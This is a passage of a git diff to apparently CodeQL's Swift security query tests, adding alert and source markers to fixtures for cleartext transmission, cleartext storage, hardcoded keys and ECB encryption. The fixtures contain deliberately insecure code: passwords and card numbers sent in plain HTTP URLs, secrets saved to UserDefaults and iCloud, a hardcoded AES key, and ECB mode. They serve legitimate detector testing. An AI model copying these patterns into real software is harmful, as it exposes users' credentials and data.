SecKeyCopyExternalRepresentation(_:_:) | testURL.swift:106:20:106:20 | "..." | This operation transmits '"..."', which may contain unencrypted sensitive data from $@. | testURL.swift:104:16:104:57 | call to SecKeyCopyExternalRepresentation(_:_:) | call to SecKeyCopyExternalRepresentation(_:_:) | -| testURL.swift:116:18:116:18 | "..." | testURL.swift:116:52:116:52 | email | testURL.swift:116:18:116:18 | "..." | This operation transmits '"..."', which may contain unencrypted sensitive data from $@. | testURL.swift:116:52:116:52 | email | email | -| testURL.swift:123:18:123:18 | "..." | testURL.swift:123:52:123:52 | phone_number | testURL.swift:123:18:123:18 | "..." | This operation transmits '"..."', which may contain unencrypted sensitive data from $@. | testURL.swift:123:52:123:52 | phone_number | phone_number | -| testURL.swift:132:18:132:18 | "..." | testURL.swift:132:39:132:39 | account_no | testURL.swift:132:18:132:18 | "..." | This operation transmits '"..."', which may contain unencrypted sensitive data from $@. | testURL.swift:132:39:132:39 | account_no | account_no | diff --git a/swift/ql/test/query-tests/Security/CWE-311/CleartextTransmission.qlref b/swift/ql/test/query-tests/Security/CWE-311/CleartextTransmission.qlref index f4c5a561e617..3b301c53e7fd 100644 --- a/swift/ql/test/query-tests/Security/CWE-311/CleartextTransmission.qlref +++ b/swift/ql/test/query-tests/Security/CWE-311/CleartextTransmission.qlref @@ -1 +1,2 @@ -queries/Security/CWE-311/CleartextTransmission.ql \ No newline at end of file +query: queries/Security/CWE-311/CleartextTransmission.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/swift/ql/test/query-tests/Security/CWE-311/SQLite.swift b/swift/ql/test/query-tests/Security/CWE-311/SQLite.swift index 6874683d8730..6c7d57f271c6 100644 --- a/swift/ql/test/query-tests/Security/CWE-311/SQLite.swift +++ b/swift/ql/test/query-tests/Security/CWE-311/SQLite.swift @@ -116,64 +116,64 @@ func ==(lhs: Expression, rhs: V) -> Expression { return Expression String { return myString } func test1(passwd : String, encrypted_passwd : String, account_no : String, credit_card_no : String) { - _ = URL(string: "http://example.com/login?p=" + passwd); // BAD + _ = URL(string: "http://example.com/login?p=" + passwd); // BAD // $ Alert[swift/cleartext-transmission] _ = URL(string: "http://example.com/login?p=" + encrypted_passwd); // GOOD (not sensitive) - _ = URL(string: "http://example.com/login?ac=" + account_no); // BAD - _ = URL(string: "http://example.com/login?cc=" + credit_card_no); // BAD + _ = URL(string: "http://example.com/login?ac=" + account_no); // BAD // $ Alert[swift/cleartext-transmission] + _ = URL(string: "http://example.com/login?cc=" + credit_card_no); // BAD // $ Alert[swift/cleartext-transmission] let base = URL(string: "http://example.com/"); // GOOD (not sensitive) _ = URL(string: "abc", relativeTo: base); // GOOD (not sensitive) - let f = URL(string: passwd, relativeTo: base); // BAD + let f = URL(string: passwd, relativeTo: base); // BAD // $ Alert[swift/cleartext-transmission] _ = URL(string: "abc", relativeTo: f); // BAD (reported on line above) let e_mail = myString - _ = URL(string: "http://example.com/login?em=" + e_mail); // BAD + _ = URL(string: "http://example.com/login?em=" + e_mail); // BAD // $ Alert[swift/cleartext-transmission] let a_homeaddr_z = getMyString() - _ = URL(string: "http://example.com/login?home=" + a_homeaddr_z); // BAD + _ = URL(string: "http://example.com/login?home=" + a_homeaddr_z); // BAD // $ Alert[swift/cleartext-transmission] let resident_ID = getMyString() - _ = URL(string: "http://example.com/login?id=" + resident_ID); // BAD + _ = URL(string: "http://example.com/login?id=" + resident_ID); // BAD // $ Alert[swift/cleartext-transmission] } func get_private_key() -> String { return "" } @@ -70,9 +70,9 @@ func test2() { _ = URL(string: "http://example.com/login?key=" + get_aes_key()); // BAD [NOT DETECTED] _ = URL(string: "http://example.com/login?key=" + get_aws_key()); // BAD [NOT DETECTED] _ = URL(string: "http://example.com/login?key=" + get_access_key()); // BAD [NOT DETECTED] - _ = URL(string: "http://example.com/login?key=" + get_secret_key()); // BAD + _ = URL(string: "http://example.com/login?key=" + get_secret_key()); // BAD // $ Alert[swift/cleartext-transmission] _ = URL(string: "http://example.com/login?key=" + get_key_press()); // GOOD (not sensitive) - _ = URL(string: "http://example.com/login?cert=" + get_cert_string()); // BAD + _ = URL(string: "http://example.com/login?cert=" + get_cert_string()); // BAD // $ Alert[swift/cleartext-transmission] _ = URL(string: "http://example.com/login?certain=" + get_certain()); // GOOD (not sensitive) } @@ -93,7 +93,7 @@ func test3() { _ = URL(string: "http://example.com/login?key=\(priv_key)"); // BAD [NOT DETECTED] _ = URL(string: "http://example.com/login?key=\(private_key)"); // BAD [NOT DETECTED] _ = URL(string: "http://example.com/login?key=\(pub_key)"); // GOOD (not sensitive) - _ = URL(string: "http://example.com/login?cert=\(certificate)"); // BAD + _ = URL(string: "http://example.com/login?cert=\(certificate)"); // BAD // $ Alert[swift/cleartext-transmission] _ = URL(string: "http://example.com/login?tok=\(secure_token)"); // BAD [NOT DETECTED] _ = URL(string: "http://example.com/login?tok=\(access_token)"); // BAD [NOT DETECTED] _ = URL(string: "http://example.com/login?tok=\(auth_token)"); // BAD [NOT DETECTED] @@ -101,9 +101,9 @@ func test3() { } func test4(key: SecKey) { - if let data = SecKeyCopyExternalRepresentation(key, nil) as? Data { + if let data = SecKeyCopyExternalRepresentation(key, nil) as? Data { // $ Source[swift/cleartext-transmission] if let string = String(data: data, encoding: .utf8) { - _ = URL(string: "http://example.com/login?tok=\(string)"); // BAD + _ = URL(string: "http://example.com/login?tok=\(string)"); // BAD // $ Alert[swift/cleartext-transmission] } } } @@ -113,14 +113,14 @@ func test5() { let email = get_string() let secret_key = get_string() - _ = URL(string: "http://example.com/login?email=\(email)"); // BAD + _ = URL(string: "http://example.com/login?email=\(email)"); // BAD // $ Alert[swift/cleartext-transmission] _ = URL(string: "mailto:\(email)"); // GOOD (revealing your e-amil address in an e-mail is expected) _ = URL(string: "mailto:info@example.com?subject=\(secret_key)"); // BAD [NOT DETECTED] _ = URL(string: "mailto:info@example.com?subject=foo&cc=\(email)"); // GOOD let phone_number = get_string() - _ = URL(string: "http://example.com/profile?tel=\(phone_number)"); // BAD + _ = URL(string: "http://example.com/profile?tel=\(phone_number)"); // BAD // $ Alert[swift/cleartext-transmission] _ = URL(string: "tel:\(phone_number)") // GOOD _ = URL(string: "telprompt:\(phone_number)") // GOOD _ = URL(string: "callto:\(phone_number)") // GOOD @@ -129,5 +129,5 @@ func test5() { let account_no = get_string() _ = URL(string: "file:///foo/bar/\(account_no).csv") // GOOD (local, so not transmitted) - _ = URL(string: "ftp://example.com/\(account_no).csv") // BAD + _ = URL(string: "ftp://example.com/\(account_no).csv") // BAD // $ Alert[swift/cleartext-transmission] } diff --git a/swift/ql/test/query-tests/Security/CWE-312/CleartextStoragePreferences.expected b/swift/ql/test/query-tests/Security/CWE-312/CleartextStoragePreferences.expected index c3ed50e498cb..9c412f25ceeb 100644 --- a/swift/ql/test/query-tests/Security/CWE-312/CleartextStoragePreferences.expected +++ b/swift/ql/test/query-tests/Security/CWE-312/CleartextStoragePreferences.expected @@ -1,3 +1,19 @@ +#select +| testNSUbiquitousKeyValueStore.swift:28:12:28:12 | password | testNSUbiquitousKeyValueStore.swift:28:12:28:12 | password | testNSUbiquitousKeyValueStore.swift:28:12:28:12 | password | This operation stores 'password' in iCloud. It may contain unencrypted sensitive data from $@. | testNSUbiquitousKeyValueStore.swift:28:12:28:12 | password | password | +| testNSUbiquitousKeyValueStore.swift:42:40:42:40 | x | testNSUbiquitousKeyValueStore.swift:41:24:41:24 | x | testNSUbiquitousKeyValueStore.swift:42:40:42:40 | x | This operation stores 'x' in iCloud. It may contain unencrypted sensitive data from $@. | testNSUbiquitousKeyValueStore.swift:41:24:41:24 | x | x | +| testNSUbiquitousKeyValueStore.swift:45:40:45:40 | y | testNSUbiquitousKeyValueStore.swift:44:10:44:22 | call to getPassword() | testNSUbiquitousKeyValueStore.swift:45:40:45:40 | y | This operation stores 'y' in iCloud. It may contain unencrypted sensitive data from $@. | testNSUbiquitousKeyValueStore.swift:44:10:44:22 | call to getPassword() | call to getPassword() | +| testNSUbiquitousKeyValueStore.swift:49:40:49:42 | .password | testNSUbiquitousKeyValueStore.swift:49:40:49:42 | .password | testNSUbiquitousKeyValueStore.swift:49:40:49:42 | .password | This operation stores '.password' in iCloud. It may contain unencrypted sensitive data from $@. | testNSUbiquitousKeyValueStore.swift:49:40:49:42 | .password | .password | +| testNSUbiquitousKeyValueStore.swift:59:40:59:40 | x | testNSUbiquitousKeyValueStore.swift:55:10:55:10 | passwd | testNSUbiquitousKeyValueStore.swift:59:40:59:40 | x | This operation stores 'x' in iCloud. It may contain unencrypted sensitive data from $@. | testNSUbiquitousKeyValueStore.swift:55:10:55:10 | passwd | passwd | +| testNSUbiquitousKeyValueStore.swift:60:40:60:40 | y | testNSUbiquitousKeyValueStore.swift:56:10:56:10 | passwd | testNSUbiquitousKeyValueStore.swift:60:40:60:40 | y | This operation stores 'y' in iCloud. It may contain unencrypted sensitive data from $@. | testNSUbiquitousKeyValueStore.swift:56:10:56:10 | passwd | passwd | +| testNSUbiquitousKeyValueStore.swift:61:40:61:40 | z | testNSUbiquitousKeyValueStore.swift:57:10:57:10 | passwd | testNSUbiquitousKeyValueStore.swift:61:40:61:40 | z | This operation stores 'z' in iCloud. It may contain unencrypted sensitive data from $@. | testNSUbiquitousKeyValueStore.swift:57:10:57:10 | passwd | passwd | +| testUserDefaults.swift:28:15:28:15 | password | testUserDefaults.swift:28:15:28:15 | password | testUserDefaults.swift:28:15:28:15 | password | This operation stores 'password' in the user defaults database. It may contain unencrypted sensitive data from $@. | testUserDefaults.swift:28:15:28:15 | password | password | +| testUserDefaults.swift:42:28:42:28 | x | testUserDefaults.swift:41:24:41:24 | x | testUserDefaults.swift:42:28:42:28 | x | This operation stores 'x' in the user defaults database. It may contain unencrypted sensitive data from $@. | testUserDefaults.swift:41:24:41:24 | x | x | +| testUserDefaults.swift:45:28:45:28 | y | testUserDefaults.swift:44:10:44:22 | call to getPassword() | testUserDefaults.swift:45:28:45:28 | y | This operation stores 'y' in the user defaults database. It may contain unencrypted sensitive data from $@. | testUserDefaults.swift:44:10:44:22 | call to getPassword() | call to getPassword() | +| testUserDefaults.swift:49:28:49:30 | .password | testUserDefaults.swift:49:28:49:30 | .password | testUserDefaults.swift:49:28:49:30 | .password | This operation stores '.password' in the user defaults database. It may contain unencrypted sensitive data from $@. | testUserDefaults.swift:49:28:49:30 | .password | .password | +| testUserDefaults.swift:59:28:59:28 | x | testUserDefaults.swift:55:10:55:10 | passwd | testUserDefaults.swift:59:28:59:28 | x | This operation stores 'x' in the user defaults database. It may contain unencrypted sensitive data from $@. | testUserDefaults.swift:55:10:55:10 | passwd | passwd | +| testUserDefaults.swift:60:28:60:28 | y | testUserDefaults.swift:56:10:56:10 | passwd | testUserDefaults.swift:60:28:60:28 | y | This operation stores 'y' in the user defaults database. It may contain unencrypted sensitive data from $@. | testUserDefaults.swift:56:10:56:10 | passwd | passwd | +| testUserDefaults.swift:61:28:61:28 | z | testUserDefaults.swift:57:10:57:10 | passwd | testUserDefaults.swift:61:28:61:28 | z | This operation stores 'z' in the user defaults database. It may contain unencrypted sensitive data from $@. | testUserDefaults.swift:57:10:57:10 | passwd | passwd | +| testUserDefaults.swift:82:28:82:40 | .value | testUserDefaults.swift:82:28:82:31 | .password | testUserDefaults.swift:82:28:82:40 | .value | This operation stores '.value' in the user defaults database. It may contain unencrypted sensitive data from $@. | testUserDefaults.swift:82:28:82:31 | .password | .password | edges | file://:0:0:0:0 | self | file://:0:0:0:0 | .value | provenance | Config | | testNSUbiquitousKeyValueStore.swift:41:24:41:24 | x | testNSUbiquitousKeyValueStore.swift:42:40:42:40 | x | provenance | | @@ -45,19 +61,3 @@ nodes | testUserDefaults.swift:82:28:82:40 | .value | semmle.label | .value | subpaths | testUserDefaults.swift:82:28:82:31 | .password | testUserDefaults.swift:74:7:74:7 | self | file://:0:0:0:0 | .value | testUserDefaults.swift:82:28:82:40 | .value | -#select -| testNSUbiquitousKeyValueStore.swift:28:12:28:12 | password | testNSUbiquitousKeyValueStore.swift:28:12:28:12 | password | testNSUbiquitousKeyValueStore.swift:28:12:28:12 | password | This operation stores 'password' in iCloud. It may contain unencrypted sensitive data from $@. | testNSUbiquitousKeyValueStore.swift:28:12:28:12 | password | password | -| testNSUbiquitousKeyValueStore.swift:42:40:42:40 | x | testNSUbiquitousKeyValueStore.swift:41:24:41:24 | x | testNSUbiquitousKeyValueStore.swift:42:40:42:40 | x | This operation stores 'x' in iCloud. It may contain unencrypted sensitive data from $@. | testNSUbiquitousKeyValueStore.swift:41:24:41:24 | x | x | -| testNSUbiquitousKeyValueStore.swift:45:40:45:40 | y | testNSUbiquitousKeyValueStore.swift:44:10:44:22 | call to getPassword() | testNSUbiquitousKeyValueStore.swift:45:40:45:40 | y | This operation stores 'y' in iCloud. It may contain unencrypted sensitive data from $@. | testNSUbiquitousKeyValueStore.swift:44:10:44:22 | call to getPassword() | call to getPassword() | -| testNSUbiquitousKeyValueStore.swift:49:40:49:42 | .password | testNSUbiquitousKeyValueStore.swift:49:40:49:42 | .password | testNSUbiquitousKeyValueStore.swift:49:40:49:42 | .password | This operation stores '.password' in iCloud. It may contain unencrypted sensitive data from $@. | testNSUbiquitousKeyValueStore.swift:49:40:49:42 | .password | .password | -| testNSUbiquitousKeyValueStore.swift:59:40:59:40 | x | testNSUbiquitousKeyValueStore.swift:55:10:55:10 | passwd | testNSUbiquitousKeyValueStore.swift:59:40:59:40 | x | This operation stores 'x' in iCloud. It may contain unencrypted sensitive data from $@. | testNSUbiquitousKeyValueStore.swift:55:10:55:10 | passwd | passwd | -| testNSUbiquitousKeyValueStore.swift:60:40:60:40 | y | testNSUbiquitousKeyValueStore.swift:56:10:56:10 | passwd | testNSUbiquitousKeyValueStore.swift:60:40:60:40 | y | This operation stores 'y' in iCloud. It may contain unencrypted sensitive data from $@. | testNSUbiquitousKeyValueStore.swift:56:10:56:10 | passwd | passwd | -| testNSUbiquitousKeyValueStore.swift:61:40:61:40 | z | testNSUbiquitousKeyValueStore.swift:57:10:57:10 | passwd | testNSUbiquitousKeyValueStore.swift:61:40:61:40 | z | This operation stores 'z' in iCloud. It may contain unencrypted sensitive data from $@. | testNSUbiquitousKeyValueStore.swift:57:10:57:10 | passwd | passwd | -| testUserDefaults.swift:28:15:28:15 | password | testUserDefaults.swift:28:15:28:15 | password | testUserDefaults.swift:28:15:28:15 | password | This operation stores 'password' in the user defaults database. It may contain unencrypted sensitive data from $@. | testUserDefaults.swift:28:15:28:15 | password | password | -| testUserDefaults.swift:42:28:42:28 | x | testUserDefaults.swift:41:24:41:24 | x | testUserDefaults.swift:42:28:42:28 | x | This operation stores 'x' in the user defaults database. It may contain unencrypted sensitive data from $@. | testUserDefaults.swift:41:24:41:24 | x | x | -| testUserDefaults.swift:45:28:45:28 | y | testUserDefaults.swift:44:10:44:22 | call to getPassword() | testUserDefaults.swift:45:28:45:28 | y | This operation stores 'y' in the user defaults database. It may contain unencrypted sensitive data from $@. | testUserDefaults.swift:44:10:44:22 | call to getPassword() | call to getPassword() | -| testUserDefaults.swift:49:28:49:30 | .password | testUserDefaults.swift:49:28:49:30 | .password | testUserDefaults.swift:49:28:49:30 | .password | This operation stores '.password' in the user defaults database. It may contain unencrypted sensitive data from $@. | testUserDefaults.swift:49:28:49:30 | .password | .password | -| testUserDefaults.swift:59:28:59:28 | x | testUserDefaults.swift:55:10:55:10 | passwd | testUserDefaults.swift:59:28:59:28 | x | This operation stores 'x' in the user defaults database. It may contain unencrypted sensitive data from $@. | testUserDefaults.swift:55:10:55:10 | passwd | passwd | -| testUserDefaults.swift:60:28:60:28 | y | testUserDefaults.swift:56:10:56:10 | passwd | testUserDefaults.swift:60:28:60:28 | y | This operation stores 'y' in the user defaults database. It may contain unencrypted sensitive data from $@. | testUserDefaults.swift:56:10:56:10 | passwd | passwd | -| testUserDefaults.swift:61:28:61:28 | z | testUserDefaults.swift:57:10:57:10 | passwd | testUserDefaults.swift:61:28:61:28 | z | This operation stores 'z' in the user defaults database. It may contain unencrypted sensitive data from $@. | testUserDefaults.swift:57:10:57:10 | passwd | passwd | -| testUserDefaults.swift:82:28:82:40 | .value | testUserDefaults.swift:82:28:82:31 | .password | testUserDefaults.swift:82:28:82:40 | .value | This operation stores '.value' in the user defaults database. It may contain unencrypted sensitive data from $@. | testUserDefaults.swift:82:28:82:31 | .password | .password | diff --git a/swift/ql/test/query-tests/Security/CWE-312/CleartextStoragePreferences.qlref b/swift/ql/test/query-tests/Security/CWE-312/CleartextStoragePreferences.qlref index 574e0e172326..dfb639f1beab 100644 --- a/swift/ql/test/query-tests/Security/CWE-312/CleartextStoragePreferences.qlref +++ b/swift/ql/test/query-tests/Security/CWE-312/CleartextStoragePreferences.qlref @@ -1 +1,2 @@ -queries/Security/CWE-312/CleartextStoragePreferences.ql +query: queries/Security/CWE-312/CleartextStoragePreferences.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/swift/ql/test/query-tests/Security/CWE-312/testNSUbiquitousKeyValueStore.swift b/swift/ql/test/query-tests/Security/CWE-312/testNSUbiquitousKeyValueStore.swift index 20627a6483be..458ccbe00da3 100644 --- a/swift/ql/test/query-tests/Security/CWE-312/testNSUbiquitousKeyValueStore.swift +++ b/swift/ql/test/query-tests/Security/CWE-312/testNSUbiquitousKeyValueStore.swift @@ -25,7 +25,7 @@ func doSomething(password: String) { } func test1(password: String, passwordHash : String) { let store = NSUbiquitousKeyValueStore.default - store.set(password, forKey: "myKey") // BAD + store.set(password, forKey: "myKey") // BAD // $ Alert store.set(passwordHash, forKey: "myKey") // GOOD (not sensitive) } @@ -38,27 +38,27 @@ func test3(x: String) { // alternative evidence of sensitivity... NSUbiquitousKeyValueStore.default.set(x, forKey: "myKey") // BAD [NOT REPORTED] - doSomething(password: x); - NSUbiquitousKeyValueStore.default.set(x, forKey: "myKey") // BAD + doSomething(password: x); // $ Source + NSUbiquitousKeyValueStore.default.set(x, forKey: "myKey") // BAD // $ Alert - let y = getPassword(); - NSUbiquitousKeyValueStore.default.set(y, forKey: "myKey") // BAD + let y = getPassword(); // $ Source + NSUbiquitousKeyValueStore.default.set(y, forKey: "myKey") // BAD // $ Alert let z = MyClass() NSUbiquitousKeyValueStore.default.set(z.harmless, forKey: "myKey") // GOOD (not sensitive) - NSUbiquitousKeyValueStore.default.set(z.password, forKey: "myKey") // BAD + NSUbiquitousKeyValueStore.default.set(z.password, forKey: "myKey") // BAD // $ Alert } func test4(passwd: String) { // sanitizers... - var x = passwd; - var y = passwd; - var z = passwd; + var x = passwd; // $ Source + var y = passwd; // $ Source + var z = passwd; // $ Source - NSUbiquitousKeyValueStore.default.set(x, forKey: "myKey") // BAD - NSUbiquitousKeyValueStore.default.set(y, forKey: "myKey") // BAD - NSUbiquitousKeyValueStore.default.set(z, forKey: "myKey") // BAD + NSUbiquitousKeyValueStore.default.set(x, forKey: "myKey") // BAD // $ Alert + NSUbiquitousKeyValueStore.default.set(y, forKey: "myKey") // BAD // $ Alert + NSUbiquitousKeyValueStore.default.set(z, forKey: "myKey") // BAD // $ Alert x = encrypt(x); hash(data: &y); diff --git a/swift/ql/test/query-tests/Security/CWE-312/testUserDefaults.swift b/swift/ql/test/query-tests/Security/CWE-312/testUserDefaults.swift index 10a1a04eedf4..dab0cc4504c1 100644 --- a/swift/ql/test/query-tests/Security/CWE-312/testUserDefaults.swift +++ b/swift/ql/test/query-tests/Security/CWE-312/testUserDefaults.swift @@ -25,7 +25,7 @@ func doSomething(password: String) { } func test1(password: String, passwordHash : String) { let defaults = UserDefaults.standard - defaults.set(password, forKey: "myKey") // BAD + defaults.set(password, forKey: "myKey") // BAD // $ Alert defaults.set(passwordHash, forKey: "myKey") // GOOD (not sensitive) } @@ -38,27 +38,27 @@ func test3(x: String) { // alternative evidence of sensitivity... UserDefaults.standard.set(x, forKey: "myKey") // BAD [NOT REPORTED] - doSomething(password: x); - UserDefaults.standard.set(x, forKey: "myKey") // BAD + doSomething(password: x); // $ Source + UserDefaults.standard.set(x, forKey: "myKey") // BAD // $ Alert - let y = getPassword(); - UserDefaults.standard.set(y, forKey: "myKey") // BAD + let y = getPassword(); // $ Source + UserDefaults.standard.set(y, forKey: "myKey") // BAD // $ Alert let z = MyClass() UserDefaults.standard.set(z.harmless, forKey: "myKey") // GOOD (not sensitive) - UserDefaults.standard.set(z.password, forKey: "myKey") // BAD + UserDefaults.standard.set(z.password, forKey: "myKey") // BAD // $ Alert } func test4(passwd: String) { // sanitizers... - var x = passwd; - var y = passwd; - var z = passwd; + var x = passwd; // $ Source + var y = passwd; // $ Source + var z = passwd; // $ Source - UserDefaults.standard.set(x, forKey: "myKey") // BAD - UserDefaults.standard.set(y, forKey: "myKey") // BAD - UserDefaults.standard.set(z, forKey: "myKey") // BAD + UserDefaults.standard.set(x, forKey: "myKey") // BAD // $ Alert + UserDefaults.standard.set(y, forKey: "myKey") // BAD // $ Alert + UserDefaults.standard.set(z, forKey: "myKey") // BAD // $ Alert x = encrypt(x); hash(data: &y); @@ -79,6 +79,6 @@ struct MyOuter { } func test5(mo : MyOuter) { - UserDefaults.standard.set(mo.password.value, forKey: "myKey") // BAD + UserDefaults.standard.set(mo.password.value, forKey: "myKey") // BAD // $ Alert UserDefaults.standard.set(mo.harmless.value, forKey: "myKey") // GOOD } diff --git a/swift/ql/test/query-tests/Security/CWE-321/HardcodedEncryptionKey.qlref b/swift/ql/test/query-tests/Security/CWE-321/HardcodedEncryptionKey.qlref index 92bca37534a5..c2fdce8b0e02 100644 --- a/swift/ql/test/query-tests/Security/CWE-321/HardcodedEncryptionKey.qlref +++ b/swift/ql/test/query-tests/Security/CWE-321/HardcodedEncryptionKey.qlref @@ -1 +1 @@ -queries/Security/CWE-321/HardcodedEncryptionKey.ql +query: queries/Security/CWE-321/HardcodedEncryptionKey.ql diff --git a/swift/ql/test/query-tests/Security/CWE-327/ECBEncryption.expected b/swift/ql/test/query-tests/Security/CWE-327/ECBEncryption.expected index 32c4082abb92..e1dcb0bbd955 100644 --- a/swift/ql/test/query-tests/Security/CWE-327/ECBEncryption.expected +++ b/swift/ql/test/query-tests/Security/CWE-327/ECBEncryption.expected @@ -1,3 +1,13 @@ +#select +| test.swift:56:37:56:37 | ecb | test.swift:50:12:50:16 | call to ECB.init() | test.swift:56:37:56:37 | ecb | The initialization of the cipher 'ecb' uses the insecure ECB block mode from $@. | test.swift:50:12:50:16 | call to ECB.init() | call to ECB.init() | +| test.swift:57:37:57:37 | ecb | test.swift:50:12:50:16 | call to ECB.init() | test.swift:57:37:57:37 | ecb | The initialization of the cipher 'ecb' uses the insecure ECB block mode from $@. | test.swift:50:12:50:16 | call to ECB.init() | call to ECB.init() | +| test.swift:58:37:58:41 | call to ECB.init() | test.swift:58:37:58:41 | call to ECB.init() | test.swift:58:37:58:41 | call to ECB.init() | The initialization of the cipher 'call to ECB.init()' uses the insecure ECB block mode from $@. | test.swift:58:37:58:41 | call to ECB.init() | call to ECB.init() | +| test.swift:59:37:59:41 | call to ECB.init() | test.swift:59:37:59:41 | call to ECB.init() | test.swift:59:37:59:41 | call to ECB.init() | The initialization of the cipher 'call to ECB.init()' uses the insecure ECB block mode from $@. | test.swift:59:37:59:41 | call to ECB.init() | call to ECB.init() | +| test.swift:60:37:60:53 | call to getECBBlockMode() | test.swift:39:9:39:13 | call to ECB.init() | test.swift:60:37:60:53 | call to getECBBlockMode() | The initialization of the cipher 'call to getECBBlockMode()' uses the insecure ECB block mode from $@. | test.swift:39:9:39:13 | call to ECB.init() | call to ECB.init() | +| test.swift:61:37:61:53 | call to getECBBlockMode() | test.swift:39:9:39:13 | call to ECB.init() | test.swift:61:37:61:53 | call to getECBBlockMode() | The initialization of the cipher 'call to getECBBlockMode()' uses the insecure ECB block mode from $@. | test.swift:39:9:39:13 | call to ECB.init() | call to ECB.init() | +| test.swift:71:42:71:42 | ecb | test.swift:50:12:50:16 | call to ECB.init() | test.swift:71:42:71:42 | ecb | The initialization of the cipher 'ecb' uses the insecure ECB block mode from $@. | test.swift:50:12:50:16 | call to ECB.init() | call to ECB.init() | +| test.swift:72:42:72:46 | call to ECB.init() | test.swift:72:42:72:46 | call to ECB.init() | test.swift:72:42:72:46 | call to ECB.init() | The initialization of the cipher 'call to ECB.init()' uses the insecure ECB block mode from $@. | test.swift:72:42:72:46 | call to ECB.init() | call to ECB.init() | +| test.swift:73:42:73:58 | call to getECBBlockMode() | test.swift:39:9:39:13 | call to ECB.init() | test.swift:73:42:73:58 | call to getECBBlockMode() | The initialization of the cipher 'call to getECBBlockMode()' uses the insecure ECB block mode from $@. | test.swift:39:9:39:13 | call to ECB.init() | call to ECB.init() | edges | test.swift:39:9:39:13 | call to ECB.init() | test.swift:60:37:60:53 | call to getECBBlockMode() | provenance | | | test.swift:39:9:39:13 | call to ECB.init() | test.swift:61:37:61:53 | call to getECBBlockMode() | provenance | | @@ -18,13 +28,3 @@ nodes | test.swift:72:42:72:46 | call to ECB.init() | semmle.label | call to ECB.init() | | test.swift:73:42:73:58 | call to getECBBlockMode() | semmle.label | call to getECBBlockMode() | subpaths -#select -| test.swift:56:37:56:37 | ecb | test.swift:50:12:50:16 | call to ECB.init() | test.swift:56:37:56:37 | ecb | The initialization of the cipher 'ecb' uses the insecure ECB block mode from $@. | test.swift:50:12:50:16 | call to ECB.init() | call to ECB.init() | -| test.swift:57:37:57:37 | ecb | test.swift:50:12:50:16 | call to ECB.init() | test.swift:57:37:57:37 | ecb | The initialization of the cipher 'ecb' uses the insecure ECB block mode from $@. | test.swift:50:12:50:16 | call to ECB.init() | call to ECB.init() | -| test.swift:58:37:58:41 | call to ECB.init() | test.swift:58:37:58:41 | call to ECB.init() | test.swift:58:37:58:41 | call to ECB.init() | The initialization of the cipher 'call to ECB.init()' uses the insecure ECB block mode from $@. | test.swift:58:37:58:41 | call to ECB.init() | call to ECB.init() | -| test.swift:59:37:59:41 | call to ECB.init() | test.swift:59:37:59:41 | call to ECB.init() | test.swift:59:37:59:41 | call to ECB.init() | The initialization of the cipher 'call to ECB.init()' uses the insecure ECB block mode from $@. | test.swift:59:37:59:41 | call to ECB.init() | call to ECB.init() | -| test.swift:60:37:60:53 | call to getECBBlockMode() | test.swift:39:9:39:13 | call to ECB.init() | test.swift:60:37:60:53 | call to getECBBlockMode() | The initialization of the cipher 'call to getECBBlockMode()' uses the insecure ECB block mode from $@. | test.swift:39:9:39:13 | call to ECB.init() | call to ECB.init() | -| test.swift:61:37:61:53 | call to getECBBlockMode() | test.swift:39:9:39:13 | call to ECB.init() | test.swift:61:37:61:53 | call to getECBBlockMode() | The initialization of the cipher 'call to getECBBlockMode()' uses the insecure ECB block mode from $@. | test.swift:39:9:39:13 | call to ECB.init() | call to ECB.init() | -| test.swift:71:42:71:42 | ecb | test.swift:50:12:50:16 | call to ECB.init() | test.swift:71:42:71:42 | ecb | The initialization of the cipher 'ecb' uses the insecure ECB block mode from $@. | test.swift:50:12:50:16 | call to ECB.init() | call to ECB.init() | -| test.swift:72:42:72:46 | call to ECB.init() | test.swift:72:42:72:46 | call to ECB.init() | test.swift:72:42:72:46 | call to ECB.init() | The initialization of the cipher 'call to ECB.init()' uses the insecure ECB block mode from $@. | test.swift:72:42:72:46 | call to ECB.init() | call to ECB.init() | -| test.swift:73:42:73:58 | call to getECBBlockMode() | test.swift:39:9:39:13 | call to ECB.init() | test.swift:73:42:73:58 | call to getECBBlockMode() | The initialization of the cipher 'call to getECBBlockMode()' uses the insecure ECB block mode from $@. | test.swift:39:9:39:13 | call to ECB.init() | call to ECB.init() | diff --git a/swift/ql/test/query-tests/Security/CWE-327/ECBEncryption.qlref b/swift/ql/test/query-tests/Security/CWE-327/ECBEncryption.qlref index ac56a6338b0f..bee507b1cd09 100644 --- a/swift/ql/test/query-tests/Security/CWE-327/ECBEncryption.qlref +++ b/swift/ql/test/query-tests/Security/CWE-327/ECBEncryption.qlref @@ -1 +1,2 @@ -queries/Security/CWE-327/ECBEncryption.ql \ No newline at end of file +query: queries/Security/CWE-327/ECBEncryption.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/swift/ql/test/query-tests/Security/CWE-327/test.swift b/swift/ql/test/query-tests/Security/CWE-327/test.swift index 382269905612..45e288a2e59d 100644 --- a/swift/ql/test/query-tests/Security/CWE-327/test.swift +++ b/swift/ql/test/query-tests/Security/CWE-327/test.swift @@ -36,7 +36,7 @@ func getRandomArray() -> Array { } func getECBBlockMode() -> BlockMode { - return ECB() + return ECB() // $ Source } func getCBCBlockMode() -> BlockMode { @@ -47,18 +47,18 @@ func getCBCBlockMode() -> BlockMode { func test1() { let key: Array = [0x2a, 0x3a, 0x80, 0x05, 0xaf, 0x46, 0x58, 0x2d, 0x66, 0x52, 0x10, 0xae, 0x86, 0xd3, 0x8e, 0x8f] - let ecb = ECB() + let ecb = ECB() // $ Source let iv = getRandomArray() let cbc = CBC(iv: iv) let padding = Padding.noPadding // AES test cases - let ab1 = AES(key: key, blockMode: ecb, padding: padding) // BAD - let ab2 = AES(key: key, blockMode: ecb) // BAD - let ab3 = AES(key: key, blockMode: ECB(), padding: padding) // BAD - let ab4 = AES(key: key, blockMode: ECB()) // BAD - let ab5 = AES(key: key, blockMode: getECBBlockMode(), padding: padding) // BAD - let ab6 = AES(key: key, blockMode: getECBBlockMode()) // BAD + let ab1 = AES(key: key, blockMode: ecb, padding: padding) // BAD // $ Alert + let ab2 = AES(key: key, blockMode: ecb) // BAD // $ Alert + let ab3 = AES(key: key, blockMode: ECB(), padding: padding) // BAD // $ Alert + let ab4 = AES(key: key, blockMode: ECB()) // BAD // $ Alert + let ab5 = AES(key: key, blockMode: getECBBlockMode(), padding: padding) // BAD // $ Alert + let 